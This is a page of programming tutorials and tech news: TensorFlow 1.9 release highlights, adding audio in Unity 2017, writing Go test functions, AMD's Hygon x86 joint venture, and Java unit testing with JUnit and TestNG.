
How-To Tutorials


TensorFlow 1.9 is now generally available

Savia Lobo
11 Jul 2018
3 min read
After the back-to-back release of the TensorFlow 1.9 release candidates rc-0, rc-1, and rc-2, the final version of TensorFlow 1.9 is out and generally available. Key highlights of this version include support for gradient boosted trees estimators, new Keras layers that speed up GRU and LSTM implementations, and the deprecation of tfe.Network. It also includes improved functions for data loading, text processing, and pre-made estimators.

TensorFlow 1.9 major features and improvements

As mentioned for TensorFlow 1.9 rc-2, the Keras-based Get Started and Programmer's Guide pages have been updated, and tf.keras has been updated to the Keras 2.1.6 API. You should try the newly added tf.keras.layers.CuDNNGRU and tf.keras.layers.CuDNNLSTM layers, which provide faster GRU and LSTM implementations. Both layers are backed by the NVIDIA CUDA Deep Neural Network library (cuDNN).

Gradient boosted trees estimators, a non-parametric statistical learning technique for classification and regression, are now supported by core feature columns and losses. Also, the Python interface for the TFLite Optimizing Converter has been expanded, and the command-line interface (also known as toco or tflite_convert) is once again included in the standard pip installation.

The distributions.Bijector API in TensorFlow 1.9 also supports broadcasting for Bijectors with the new API changes.

TensorFlow 1.9 also includes improved data loading and text processing with tf.decode_compressed, tf.string_strip, and tf.strings.regex_full_match. It adds experimental support for new pre-made estimators such as tf.contrib.estimator.BaselineEstimator, tf.contrib.estimator.RNNClassifier, and tf.contrib.estimator.RNNEstimator.

This version includes two breaking changes. First, to open an empty variable scope, replace variable_scope('', ...) with variable_scope(tf.get_variable_scope(), ...), which fetches the current variable scope. Second, the headers used for building custom ops have been moved from site-packages/external to site-packages/tensorflow/include/external.

Some bug fixes and other changes include:

tfe.Network has been deprecated.
Layered variable names have changed in the following conditions: using tf.keras.layers with custom variable scopes, and using tf.layers in a subclassed tf.keras.Model class.
Added the ability to pause recording operations for gradient computation via tf.GradientTape.stop_recording in eager execution, and updated its documentation and introductory notebooks.
Fixed an issue in which the TensorBoard Debugger Plugin could not handle a total source file size exceeding the gRPC message size limit (4 MB).
Added GCS configuration ops and complex128 support to FFT, FFT2D, FFT3D, IFFT, IFFT2D, and IFFT3D.
Conv3D, Conv3DBackpropInput, and Conv3DBackpropFilter now support arbitrary.
Prevents tf.gradients() from backpropagating through integer tensors.
LinearOperator[1D,2D,3D]Circulant added to tensorflow.linalg.

To know more about the other changes, visit the TensorFlow 1.9 release notes on GitHub.

Read more:
Create a TensorFlow LSTM that writes stories [Tutorial]
Build and train an RNN chatbot using TensorFlow [Tutorial]
Use TensorFlow and NLP to detect duplicate Quora questions [Tutorial]
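To make the first breaking change above concrete, here is a minimal before/after sketch of the variable_scope migration described in the release notes. It is only a sketch against the TensorFlow 1.x API; the reuse flag and the 'weights' variable are illustrative and not part of the release notes themselves.

    import tensorflow as tf

    # Old pattern (before 1.9): re-opening the current scope via an empty name.
    # with tf.variable_scope('', reuse=tf.AUTO_REUSE):
    #     weights = tf.get_variable('weights', shape=[10, 10])

    # New pattern (1.9 onwards): pass the current scope object explicitly.
    with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
        weights = tf.get_variable('weights', shape=[10, 10])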


Implementing Unity 2017 Game Audio [Tutorial]

Amarabha Banerjee
11 Jul 2018
11 min read
Background music and audio effects play a big role in determining any game's success or failure. Creating engaging game audio, importing audio from other sources, and working with and customizing Audio FX clips as per the game flow is a vital task for any game developer. In this article, we are going to discuss how to create, customize, and use third-party audio in Unity games. This article is a part of the book titled "Unity 2017 2D Game Development Projects" written by Lauren S. Ferro & Francesco Sapio.

Basics of audio and sound FX in Unity

Adding sound in Unity is simple enough, but you can implement it better if you understand how sound travels. While this is extremely important in 3D games because of the added third dimension, it is quite important in 2D games too, just in a slightly different way. Before we discuss the differences, let's first learn about what sound is and how it works, with a quick physics lesson.

Listening to the physics behind sound

What we hear is not just music, sound effects (FX), and ambient background noise. Sound is a longitudinal, mechanical (vibrating) wave. These "waves" can pass through different mediums (for example, air, water, your desk) but not through a vacuum. Therefore, no one will hear your screams in space. Sound is a variation in pressure. A region of increased pressure on a sound wave is called a compression (or condensation). A region of decreased pressure on a sound wave is called a rarefaction (or dilation). You can see this concept illustrated in the following image:

Just as the density of certain materials, such as glass and plastic, allows a certain amount of light to pass through them and influences how that light behaves, such as bending/refracting (that is, the index of refraction), various materials (for example, liquids, solids, gases) have a similar effect when it comes to allowing sound waves to pass. Some materials allow the sound to pass easily, while others dampen it. Therefore, sound studios/booths are made of certain materials to remove things such as echoes. It's similar to screaming underwater that there is a shark: it won't be as loud as if you scream from your kitchen to tell everyone dinner is ready.

Another thing to consider is what is known as the Doppler Effect. The Doppler Effect results from an increase (or decrease) in the frequency of sound (and other things such as light, or ripples in water) as the source of the sound and the person/player move toward (or away from) each other. A simple example of this is when an emergency vehicle passes by you. You will notice that the sound of the siren is different before it reaches you, when it is near you, and once it passes you. This is because there is a sudden change in pitch as the siren passes. This is visualized in the following image:

So, what is the point of knowing this when it comes to developing games? Well, this is particularly important when creating games, more so in 3D, in relation to how sounds are heard by players. For example, imagine that you're nearing a creek, but there are dense bushes, large pine trees, and rugged terrain. The sound that creek makes from where the player stands in the game world is going to be very different from what it would be on a completely flat plane free from any vegetation.
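For readers who want the equation behind the siren example, the classical Doppler relation for sound can be written as follows. This is general physics background rather than anything Unity asks you to compute; here v is the speed of sound in the medium, and the listener and source speeds are measured along the line joining them, taken as positive when they move toward each other:

    f_{\text{heard}} = f_{\text{emitted}} \cdot \frac{v + v_{\text{listener}}}{v - v_{\text{source}}}

As the emergency vehicle passes you, the sign of its velocity relative to you flips, which produces exactly the sudden change in pitch described above.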
When it comes to 2D games, this is not necessarily as important because we are working without depth (the z-axis), but similar principles apply when players are navigating around a top-down environment and they are near a point of interest. You don't want that sound to be as loud when the player is far away as it would be if they were up close. Within the context of 2D and 3D sounds, Unity has a parameter for this exact thing called Spatial Blend. We will discuss this more in the Audio Source section.

There are several ways that you can create audio within Unity, from importing your own/downloaded sounds to recording it live. Like images, Unity can import most standard audio file formats: AIFF, WAV, MP3, and Ogg, as well as tracker modules (for example, short instrument samples): .xm, .mod, .it, and .s3m.

Importing audio

Importing audio into Unity follows the same processes as importing any other type of asset. We will cover the basics of what you need to know in the following sections.

Audio Listener

Have you heard the saying, If a tree falls in a forest and no one is there to hear it, does it still make a sound? Well, in Unity, if there is nothing to hear your audio, then the answer is no. This is because Unity has a component called an Audio Listener, which works like a microphone. To locate the Audio Listener, click the Main Camera, and then look over at the Inspector; it should be located near the bottom, like in the following image:

If for some reason it isn't there, you can always add it by clicking the Add Component button, typing Audio Listener, and selecting it from the list, like in the following image:

The important thing to remember is that an Audio Listener is the location of the sound, so it makes sense that it is typically placed on the Main Camera, but it can also be placed on a Player. A single scene can only have one Audio Listener; therefore, it's best to experiment to see which placement works best for your game. It is also important to remember that an Audio Listener works with an Audio Source, and must have one to work.

Audio Source

The Audio Source is where the sound comes from. This can be many different objects within a Scene as well as background music and sound FX. The Audio Source has several parameters; later we will briefly discuss the main ones. To see more information about all the parameters, you can check out the official Unity documentation: https://docs.unity3d.com/2017.2/Documentation/Manual/class-AudioSource.html

You may be wondering why we should have a slider for Spatial Blend instead of a checkbox. This is because we need to fade between 2D and 3D, and there is a good reason for this. Imagine that you're in a game and you're looking at a screen on a computer. In this case, your camera is going to be fixated on whatever is on the screen. This could be checking an inventory or even entering nuclear codes. In any case, you will want the sound that is being emitted from the screen to be the focal audio. Therefore, the slider in the Spatial Blend parameter is going to be closer to 2D. This is because you may still want ambient noises that are in the background incorporated into the experience. So, if you are closer to 2D, the sound will be the same in both speakers (or headphones). The closer you slide toward 3D, the more the volume will depend on the proximity of the Audio Listener to the Audio Source.
It will also allow things such as the Doppler Effect to be more noticeable, as it takes place in 3D space. There are also specific settings for these things.

Choosing sounds for background and FX

When it comes to picking the right kind of music for your game, just like the aesthetics, you need to think about what kind of "mood" you're trying to create. Is it a somber or uplifting kind of mood? Are you ironically contrasting the graphics (for example, happy) with gloomy music? There is really no right or wrong when it comes to your musical selection if you can communicate to the player what they are supposed to feel, at least in general. I have provided some example "moods" that you can apply to this game. Of course, you're welcome to choose sounds other than these that are more to your liking!

All the sounds that we will use will be from the Free Sound website: https://freesound.org. You will need to create an account to download them, but it's free and there are many great sounds that you can use when creating games. That said, if you're intending to create your games for commercial purposes, please make sure that you check the Terms and Conditions on Free Sound to make sure that you're not violating any of them. Each track will have its own attribution licenses, including those for commercial use, so always check! For this project, we're going to stick with the "Happy" version. But I encourage you to experiment!

Happy
Collecting Angel Cakes: Chime sound (https://freesound.org/people/jgreer/sounds/333629/)
Being attacked by the enemy: Cat Purr/Twit4.wav (https://freesound.org/people/steffcaffrey/sounds/262309/)
Collecting health: correct (https://freesound.org/people/ertfelda/sounds/243701/)
Collecting bonuses: Signal-Ring 1 (https://freesound.org/people/Vendarro/sounds/399315/)
Background: Kirmes_Orgel_004_2_Rosamunde.mp3 (https://freesound.org/people/bilwiss/sounds/24720/)

Sad
Collecting Angel Cakes: Glass Tap (https://freesound.org/people/Unicornaphobist/sounds/262958/)
Being attacked by the enemy: musicbox1.wav (https://freesound.org/people/sandocho/sounds/17700/)
Collecting health: chime.wav (https://freesound.org/people/Psykoosiossi/sounds/398661/)
Collecting bonuses: short metallic hit (https://freesound.org/people/waveplay/sounds/366400/)
Background: improvised chill 8 (https://freesound.org/people/waveplay/sounds/238529/)

Retro
Collecting Angel Cakes: TF_Buzz.flac (https://freesound.org/people/copyc4t/sounds/235652/)
Being attacked by the enemy: Game Die (https://freesound.org/people/josepharaoh99/sounds/364929/)
Collecting health: galanghee.wav (https://freesound.org/people/metamorphmuses/sounds/91387/)
Collecting bonuses: SW05.WAV (https://freesound.org/people/mad-monkey/sounds/66684/)
Background: Angel-techno pop music loop (https://freesound.org/people/frankum/sounds/387410/)

Not everyone can hear well or at all, so it pays to keep this in mind when you're developing games that may rely on audio to provide feedback to players. While subtitles can make dialogue more accessible, sound FX can be a little trickier. Therefore, when it comes to implementing audio, think about how you could complement it, even if the effect that you're trying to achieve with sound is subtle. For example, if you play a "bleep" for every item collected, perhaps you could associate it with a slight glow or flash of color. The choice is up to you, but it's something to keep in mind.
On the other end of the spectrum, those who can hear might also want to turn the sounds off. We've all played that game (or several) that really begins to become irritating, so make sure that you also check this while you're playtesting. You don't want an awesome game to suck because your audio is intolerable and there is no option to TURN THE SOUND OFF! You've been warned.

Integrating background music in our game

Once you choose which music better suits the kind of feel you want to create for your game, import both the sounds and the music into the project. If you want, you can create two folders for them, SoundFX and Music, respectively. Now, in our scene, we need to do the following:

1. Create an empty game object (by clicking GameObject | Create Empty) and rename it Background Music.
2. Attach an Audio Source component (in the Inspector, click Add Component | Audio | Audio Source).
3. Next, drag and drop the music we decided on/downloaded into the AudioClip variable and check the Loop option, so the background music will never stop. Also check that Play On Awake is ticked as well (it should be by default), so the music will start playing as soon as the game starts.
4. Hit Play to start the game.
5. Lastly, adjust the volume, depending on the music you chose. This may require a bit of playtesting (remember to set the value after play mode, because the settings you adjust during play mode are not kept).

In the end, this is how the component should look (in the image, I chose the happy theme music, and set a Volume of 0.1):

Here in this article we have shown you how to incorporate game audio effects and background music in Unity games. If you liked this article, then check out the complete book Unity 2017 2D Game Development Projects.

Read more:
AI for Unity game developers: How to emulate real-world senses in your NPC agent
Working with Unity Variables to script powerful Unity 2017 games
How to use arrays, lists, and dictionaries in Unity for 3D game development


Writing test functions in Golang [Tutorial]

Natasha Mathur
10 Jul 2018
9 min read
Go is a modern programming language built for 21st-century application development. Hardware and technology have advanced significantly over the past decade, and most other languages do not take advantage of these technological advancements. Go allows us to build network applications that take advantage of the concurrency and parallelism made available by multicore systems. Testing is an important part of programming, whether it is in Go or in any other language. Go has a straightforward approach to writing tests, and in this tutorial, we will look at some important tools to help with testing. This tutorial is an excerpt from the book 'Distributed Computing with Go', written by V.N. Nikhil Anurag.

There are certain rules and conventions we need to follow to test our code. They are as follows:

Source files and associated test files are placed in the same package/folder
The name of the test file for any given source file is <source-file-name>_test.go
Test functions need to have the "Test" prefix, and the next character in the function name should be capitalized

In the remainder of this tutorial, we will look at three files and their associated tests:

variadic.go and variadic_test.go
addInt.go and addInt_test.go
nil_test.go (there isn't any source file for these tests)

Along the way, we will introduce any concepts we might use.

variadic.go

In order to understand the first set of tests, we need to understand what a variadic function is and how Go handles it. Let's start with the definition: a variadic function is a function that can accept any number of arguments during a function call. Given that Go is a statically typed language, the only limitation imposed by the type system on a variadic function is that the indefinite number of arguments passed to it should be of the same data type. However, this does not limit us from passing other variable types. The arguments are received by the function as a slice of elements if arguments are passed, or as nil when none are passed. Let's look at the code to get a better idea:

    // variadic.go
    package main

    func simpleVariadicToSlice(numbers ...int) []int {
        return numbers
    }

    func mixedVariadicToSlice(name string, numbers ...int) (string, []int) {
        return name, numbers
    }

    // Does not work.
    // func badVariadic(name ...string, numbers ...int) {}

We use the ... prefix before the data type to define a function as a variadic function. Note that we can have only one variadic parameter per function and it has to be the last parameter. We can see this error if we uncomment the line for badVariadic and try to test the code.

variadic_test.go

We would like to test the two valid functions, simpleVariadicToSlice and mixedVariadicToSlice, for the various rules defined above.
However, for the sake of brevity, we will test these:

simpleVariadicToSlice: This is for no arguments, three arguments, and also to look at how to pass a slice to a variadic function
mixedVariadicToSlice: This is to accept a simple argument and a variadic argument

Let's now look at the code to test these two functions:

    // variadic_test.go
    package main

    import "testing"

    func TestSimpleVariadicToSlice(t *testing.T) {
        // Test for no arguments
        if val := simpleVariadicToSlice(); val != nil {
            t.Error("value should be nil", nil)
        } else {
            t.Log("simpleVariadicToSlice() -> nil")
        }

        // Test for random set of values
        vals := simpleVariadicToSlice(1, 2, 3)
        expected := []int{1, 2, 3}
        isErr := false
        for i := 0; i < 3; i++ {
            if vals[i] != expected[i] {
                isErr = true
                break
            }
        }
        if isErr {
            t.Error("value should be []int{1, 2, 3}", vals)
        } else {
            t.Log("simpleVariadicToSlice(1, 2, 3) -> []int{1, 2, 3}")
        }

        // Test for a slice
        vals = simpleVariadicToSlice(expected...)
        isErr = false
        for i := 0; i < 3; i++ {
            if vals[i] != expected[i] {
                isErr = true
                break
            }
        }
        if isErr {
            t.Error("value should be []int{1, 2, 3}", vals)
        } else {
            t.Log("simpleVariadicToSlice([]int{1, 2, 3}...) -> []int{1, 2, 3}")
        }
    }

    func TestMixedVariadicToSlice(t *testing.T) {
        // Test for simple argument & no variadic arguments
        name, numbers := mixedVariadicToSlice("Bob")
        if name == "Bob" && numbers == nil {
            t.Log("Received as expected: Bob, <nil slice>")
        } else {
            t.Errorf("Received unexpected values: %s, %s", name, numbers)
        }
    }

Running tests in variadic_test.go

Let's run these tests and see the output. We'll use the -v flag while running the tests to see the output of each individual test:

    $ go test -v ./{variadic_test.go,variadic.go}
    === RUN TestSimpleVariadicToSlice
    --- PASS: TestSimpleVariadicToSlice (0.00s)
        variadic_test.go:10: simpleVariadicToSlice() -> nil
        variadic_test.go:26: simpleVariadicToSlice(1, 2, 3) -> []int{1, 2, 3}
        variadic_test.go:41: simpleVariadicToSlice([]int{1, 2, 3}...) -> []int{1, 2, 3}
    === RUN TestMixedVariadicToSlice
    --- PASS: TestMixedVariadicToSlice (0.00s)
        variadic_test.go:49: Received as expected: Bob, <nil slice>
    PASS
    ok command-line-arguments 0.001s

addInt.go

The tests in variadic_test.go elaborated on the rules for the variadic function. However, you might have noticed that TestSimpleVariadicToSlice ran three tests in its function body, but go test treats it as a single test. Go provides a good way to run multiple tests within a single function, and we shall look at them in addInt_test.go. For this example, we will use a very simple function, as shown in this code:

    // addInt.go
    package main

    func addInt(numbers ...int) int {
        sum := 0
        for _, num := range numbers {
            sum += num
        }
        return sum
    }

addInt_test.go

You might have also noticed in TestSimpleVariadicToSlice that we duplicated a lot of logic, while the only varying factor was the input and expected values. One style of testing, known as table-driven development, defines a table of all the required data to run a test, iterates over the "rows" of the table, and runs tests against them. Let's look at the tests we will be running against no arguments and variadic arguments:

    // addInt_test.go
    package main

    import (
        "testing"
    )

    func TestAddInt(t *testing.T) {
        testCases := []struct {
            Name     string
            Values   []int
            Expected int
        }{
            {"addInt() -> 0", []int{}, 0},
            {"addInt([]int{10, 20, 100}) -> 130", []int{10, 20, 100}, 130},
        }
        for _, tc := range testCases {
            t.Run(tc.Name, func(t *testing.T) {
                sum := addInt(tc.Values...)
                if sum != tc.Expected {
                    t.Errorf("%d != %d", sum, tc.Expected)
                } else {
                    t.Logf("%d == %d", sum, tc.Expected)
                }
            })
        }
    }

Running tests in addInt_test.go

Let's now run the tests in this file; we expect each row of the testCases table to be treated as a separate test:

    $ go test -v ./{addInt.go,addInt_test.go}
    === RUN TestAddInt
    === RUN TestAddInt/addInt()_->_0
    === RUN TestAddInt/addInt([]int{10,_20,_100})_->_130
    --- PASS: TestAddInt (0.00s)
        --- PASS: TestAddInt/addInt()_->_0 (0.00s)
            addInt_test.go:23: 0 == 0
        --- PASS: TestAddInt/addInt([]int{10,_20,_100})_->_130 (0.00s)
            addInt_test.go:23: 130 == 130
    PASS
    ok command-line-arguments 0.001s

nil_test.go

We can also create tests that are not specific to any particular source file; the only criterion is that the filename needs to have the <text>_test.go form. The tests in nil_test.go elucidate some useful features of the language which the developer might find useful while writing tests. They are as follows:

httptest.NewServer: Imagine the case where we have to test our code against a server that sends back some data. Starting and coordinating a full-blown server to access some data is hard. The httptest.NewServer function solves this issue for us.
t.Helper: If we use the same logic to pass or fail a lot of testCases, it would make sense to segregate this logic into a separate function. However, this would skew the test run call stack. We can see this by commenting t.Helper() in the tests and rerunning go test.

We can also format our command-line output to print pretty results. We will show a simple example of adding a tick mark for passed cases and a cross mark for failed cases. In the test, we will run a test server, make GET requests on it, and then test the expected output versus the actual output:

    // nil_test.go
    package main

    import (
        "fmt"
        "io/ioutil"
        "net/http"
        "net/http/httptest"
        "testing"
    )

    const passMark = "\u2713"
    const failMark = "\u2717"

    func assertResponseEqual(t *testing.T, expected string, actual string) {
        t.Helper() // comment this line to see tests fail due to 'if expected != actual'
        if expected != actual {
            t.Errorf("%s != %s %s", expected, actual, failMark)
        } else {
            t.Logf("%s == %s %s", expected, actual, passMark)
        }
    }

    func TestServer(t *testing.T) {
        testServer := httptest.NewServer(
            http.HandlerFunc(
                func(w http.ResponseWriter, r *http.Request) {
                    path := r.RequestURI
                    if path == "/1" {
                        w.Write([]byte("Got 1."))
                    } else {
                        w.Write([]byte("Got None."))
                    }
                }))
        defer testServer.Close()

        for _, testCase := range []struct {
            Name     string
            Path     string
            Expected string
        }{
            {"Request correct URL", "/1", "Got 1."},
            {"Request incorrect URL", "/12345", "Got None."},
        } {
            t.Run(testCase.Name, func(t *testing.T) {
                res, err := http.Get(testServer.URL + testCase.Path)
                if err != nil {
                    t.Fatal(err)
                }
                actual, err := ioutil.ReadAll(res.Body)
                res.Body.Close()
                if err != nil {
                    t.Fatal(err)
                }
                assertResponseEqual(t, testCase.Expected, fmt.Sprintf("%s", actual))
            })
        }

        t.Run("Fail for no reason", func(t *testing.T) {
            assertResponseEqual(t, "+", "-")
        })
    }

Running tests in nil_test.go

We run three tests, where two test cases will pass and one will fail. This way we can see the tick mark and cross mark in action:

    $ go test -v ./nil_test.go
    === RUN TestServer
    === RUN TestServer/Request_correct_URL
    === RUN TestServer/Request_incorrect_URL
    === RUN TestServer/Fail_for_no_reason
    --- FAIL: TestServer (0.00s)
        --- PASS: TestServer/Request_correct_URL (0.00s)
            nil_test.go:55: Got 1. == Got 1.
        --- PASS: TestServer/Request_incorrect_URL (0.00s)
            nil_test.go:55: Got None. == Got None.
        --- FAIL: TestServer/Fail_for_no_reason (0.00s)
            nil_test.go:59: + != -
    FAIL
    exit status 1
    FAIL command-line-arguments 0.003s

We looked at how to write test functions in Go, and learned a few interesting concepts when dealing with a variadic function and other useful test functions. If you found this post useful, do check out the book 'Distributed Computing with Go' to learn more about testing, Goroutines, RESTful web services, and other concepts in Go.

Read more:
Why is Go the go-to language for cloud-native development? – An interview with Mina Andrawos
Systems programming with Go in UNIX and Linux
How to build a basic server-side chatbot using Go


AMD’s $293 million JV with Chinese chipmaker Hygon starts production of x86 CPUs

Natasha Mathur
10 Jul 2018
3 min read
Chinese chip producer Hygon has begun production of China-made x86 processors named "Dhyana". These processors use AMD's Zen microarchitecture and are the result of the licensing deal between AMD and its Chinese partners. Hygon has started shipping the new "Dhyana" x86 CPUs.

According to official statements made by AMD, it does not permit the selling of its final chip designs to its partners in China; instead, it encourages its partners to design their own processors that suit the needs of the Chinese server market. This is part of an effort to break China's dependency on the foreign technology market.

In 2016, AMD announced that it was working on a joint project in China to develop processors. This provided AMD with $293 million in cash from Tianjin Haiguang Advanced Technology Investment Co. (THATIC), a joint venture that includes AMD as well as the Chinese Academy of Sciences. What's interesting is that AMD managed to establish a license allowing Chinese processor manufacturers to develop and sell x86 processors despite the fact that Intel was blocked from selling Xeon processors to China in 2015 by the Obama administration. This happened over concerns that the chips would help China's nuclear weapon programs.

The Dhyana processors currently focus on embedded applications. They are a system on chip (SoC) rather than a socketed chip, but this design doesn't prevent the Dhyana processors from being used in high-performance or data center applications, which usually leverage Intel Xeon and other server processors. Also, Linux kernel developers have stated that the new x86 processors are very close in design to AMD's EPYC. In fact, moving the Linux kernel code for EPYC processors to the Hygon chips required fewer than 200 new lines of code, according to a report from Michael Larabel of Phoronix. The only differences between the two are the vendor IDs and family series.

Apart from the AMD deal, there are other chip-producing ventures that China is heavily invested in. One such venture is Zhaoxin Semiconductor, which is working to manufacture x86 chips through a partnership with VIA. China is making continuous efforts to free itself from US interventions and to change its long-term processor market.

There are indications that most of the x86 processors are 14nm chips, but there isn't much information available on the capabilities of the Dhyana family, and other details of their manufacturing characteristics are still to be known.

Read more:
Baidu releases Kunlun AI chip, China's first cloud-to-edge AI chip
Qualcomm announces a new chipset for standalone AR/VR headsets at Augmented World Expo


Unit testing with Java frameworks: JUnit and TestNG [Tutorial]

Fatema Patrawala
10 Jul 2018
10 min read
Frequent manual testing is too impractical for any but the smallest systems. The only way around this is the use of automated tests. Automated tests are an effective method to reduce the time and cost of building, deploying, and maintaining applications. In order to effectively manage applications, it is of the utmost importance that both the implementation and test code are as simple as possible. In this tutorial, we will look at two simple and easy-to-learn Java unit testing frameworks for writing and running tests: JUnit and TestNG. You are reading a Java unit testing tutorial from the book Test Driven Java Development - Second Edition, written by Alex Garcia and Viktor Farcic.

Simplicity of code is one of the core extreme programming (XP) values and the key to Test Driven Development (TDD) and programming in general. It is most often accomplished through division into small units. In Java, units are methods. Being the smallest, the feedback loop they provide is the fastest, so we spend most of our time thinking about and working on them. As a counterpart to implementation methods, unit tests should constitute by far the biggest percentage of all tests. So let us look at what unit testing is and then get into the usage of the frameworks.

What is Unit testing?

Unit testing is a practice that forces us to test small, individual, and isolated units of code. They are usually methods, even though in some cases classes or even whole applications can be considered to be units as well. In order to write unit tests, the code under test needs to be isolated from the rest of the application. Preferably, that isolation is already ingrained in the code, or it can be accomplished with the use of mocks. If unit tests of a particular method cross the boundaries of that unit, then they become integration tests. As such, it becomes less clear what is under test. In case of a failure, the scope of the problem suddenly increases and finding the cause becomes more tedious.

Java Unit testing frameworks

In this section, two of the most used Java frameworks for unit testing are shown and briefly commented on. We will focus on their syntax and main features by comparing a test class written using both JUnit and TestNG. Although there are slight differences, both frameworks offer the most commonly used functionalities, and the main difference is how tests are executed and organized.

Let's start with a question. What is a test? How can we define it? A test is a repeatable process or method that verifies the correct behavior of a tested target in a determined situation with a determined input, expecting a predefined output or interactions. In the programming approach, there are several types of tests depending on their scope: functional tests, acceptance tests, and unit tests. Further on, we will explore each of those types of tests in more detail. Let's see how to test a single Java class.
The class is quite simple, but enough for our interest:

    public class Friendships {

        private final Map<String, List<String>> friendships = new HashMap<>();

        public void makeFriends(String person1, String person2) {
            addFriend(person1, person2);
            addFriend(person2, person1);
        }

        public List<String> getFriendsList(String person) {
            if (!friendships.containsKey(person)) {
                return Collections.emptyList();
            }
            return friendships.get(person);
        }

        public boolean areFriends(String person1, String person2) {
            return friendships.containsKey(person1)
                    && friendships.get(person1).contains(person2);
        }

        private void addFriend(String person, String friend) {
            if (!friendships.containsKey(person)) {
                friendships.put(person, new ArrayList<String>());
            }
            List<String> friends = friendships.get(person);
            if (!friends.contains(friend)) {
                friends.add(friend);
            }
        }
    }

Testing with JUnit

JUnit is a simple and easy-to-learn framework for writing and running tests. Each test is mapped as a method, and each method should represent a specific known scenario in which a part of our code will be executed. The code verification is made by comparing the expected output or behavior with the actual output.

The following is the test class written with JUnit. There are some scenarios missing, but for now we are interested in showing what tests look like. We will focus on better ways to test our code and on best practices later in this book. Test classes usually consist of three stages: set up, test, and tear down. Let's start with methods that set up data needed for tests. A setup can be performed on a class or method level:

    Friendships friendships;

    @BeforeClass
    public static void beforeClass() {
        // This method will be executed once on initialization time
    }

    @Before
    public void before() {
        friendships = new Friendships();
        friendships.makeFriends("Joe", "Audrey");
        friendships.makeFriends("Joe", "Peter");
        friendships.makeFriends("Joe", "Michael");
        friendships.makeFriends("Joe", "Britney");
        friendships.makeFriends("Joe", "Paul");
    }

The @BeforeClass annotation specifies a method that will be run once before any of the test methods in the class. It is a useful way to do some general set up that will be used by most (if not all) tests. The @Before annotation specifies a method that will be run before each test method. We can use it to set up test data without worrying that the tests that are run afterwards will change the state of that data. In the preceding example, we're instantiating the Friendships class and adding five sample entries to the friendships list. No matter what changes are performed by each individual test, this data will be recreated over and over until all the tests are performed. Common examples of usage of those two annotations are the setting up of database data, the creation of files needed for tests, and so on. Later on, we'll see how external dependencies can and should be avoided using mocks. Nevertheless, functional or integration tests might still need those dependencies, and the @Before and @BeforeClass annotations are a good way to set them up.
Once the data is set up, we can proceed with the actual tests:

    @Test
    public void alexDoesNotHaveFriends() {
        Assert.assertTrue("Alex does not have friends",
                friendships.getFriendsList("Alex").isEmpty());
    }

    @Test
    public void joeHas5Friends() {
        Assert.assertEquals("Joe has 5 friends", 5,
                friendships.getFriendsList("Joe").size());
    }

    @Test
    public void joeIsFriendWithEveryone() {
        List<String> friendsOfJoe =
                Arrays.asList("Audrey", "Peter", "Michael", "Britney", "Paul");
        Assert.assertTrue(friendships.getFriendsList("Joe")
                .containsAll(friendsOfJoe));
    }

In this example, we are using a few of the many different types of asserts. We're confirming that Alex does not have any friends, while Joe is a very popular guy with five friends (Audrey, Peter, Michael, Britney, and Paul).

Finally, once the tests are finished, we might need to perform some cleanup:

    @AfterClass
    public static void afterClass() {
        // This method will be executed once when all test are executed
    }

    @After
    public void after() {
        // This method will be executed once after each test execution
    }

In our example, in the Friendships class, we have no need to clean up anything. If there were such a need, those two annotations would provide that feature. They work in a similar fashion to the @Before and @BeforeClass annotations: @AfterClass is run once all tests are finished, and the @After annotation is executed after each test. JUnit runs each test method as a separate class instance. As long as we are avoiding global variables and external resources, such as databases and APIs, each test is isolated from the others. Whatever was done in one does not affect the rest. The complete source code can be found in the FriendshipsTest class at https://bitbucket.org/vfarcic/tdd-java-ch02-example-junit.

Testing with TestNG

In TestNG, tests are organized in classes, just as in the case of JUnit. The following Gradle configuration (build.gradle) is required in order to run TestNG tests:

    dependencies {
        testCompile group: 'org.testng', name: 'testng', version: '6.8.21'
    }

    test.useTestNG() {
        // Optionally you can filter which tests are executed using
        // exclude/include filters
        // excludeGroups 'complex'
    }

Unlike JUnit, TestNG requires additional Gradle configuration that tells it to use TestNG to run tests. The following test class is written with TestNG and is a reflection of what we did earlier with JUnit. Repeated imports and other boring parts are omitted with the intention of focusing on the relevant parts:

    @BeforeClass
    public static void beforeClass() {
        // This method will be executed once on initialization time
    }

    @BeforeMethod
    public void before() {
        friendships = new Friendships();
        friendships.makeFriends("Joe", "Audrey");
        friendships.makeFriends("Joe", "Peter");
        friendships.makeFriends("Joe", "Michael");
        friendships.makeFriends("Joe", "Britney");
        friendships.makeFriends("Joe", "Paul");
    }

You probably already noticed the similarities between JUnit and TestNG. Both use annotations to specify what the purposes of certain methods are. Besides different names (@BeforeClass versus @BeforeMethod), there is no difference between the two. However, unlike JUnit, TestNG reuses the same test class instance for all test methods. This means that the test methods are not isolated by default, so more care is needed in the before and after methods.
Asserts are very similar as well:

    public void alexDoesNotHaveFriends() {
        Assert.assertTrue(friendships.getFriendsList("Alex").isEmpty(),
                "Alex does not have friends");
    }

    public void joeHas5Friends() {
        Assert.assertEquals(friendships.getFriendsList("Joe").size(), 5,
                "Joe has 5 friends");
    }

    public void joeIsFriendWithEveryone() {
        List<String> friendsOfJoe =
                Arrays.asList("Audrey", "Peter", "Michael", "Britney", "Paul");
        Assert.assertTrue(friendships.getFriendsList("Joe")
                .containsAll(friendsOfJoe));
    }

The only notable difference when compared with JUnit is the order of the assert arguments. While the JUnit assert's order of arguments is optional message, expected value, and actual value, TestNG's order is actual value, expected value, and optional message. Besides the difference in the order of arguments we're passing to the assert methods, there are almost no differences between JUnit and TestNG.

You might have noticed that @Test is missing. TestNG allows us to set it on the class level and thus convert all public methods into tests. The @After annotations are also very similar. The only notable difference is the TestNG @AfterMethod annotation, which acts in the same way as the JUnit @After annotation.

As you can see, the syntax is pretty similar. Tests are organized into classes, and test verifications are made using assertions. That is not to say that there are no more important differences between those two frameworks; we'll see some of them throughout this book. I invite you to explore JUnit and TestNG by yourself. The complete source code with the preceding examples can be found here. The assertions we have written until now have used only the testing frameworks. However, there are some test utilities that can help us make them nicer and more readable.

To summarize, we learned about JUnit and TestNG, the Java unit testing frameworks. We also ran tests on both frameworks to understand their usage and the differences between the two. To learn concepts of test-driven development in Java that help you build clean, maintainable, and robust code, check out the book Test Driven Java Development - Second Edition.

Read more:
Unit Testing Apps with Android Studio
Unit Testing in .NET Core with Visual Studio 2017 for better code quality


Create a TensorFlow LSTM that writes stories [Tutorial]

Packt Editorial Staff
09 Jul 2018
18 min read
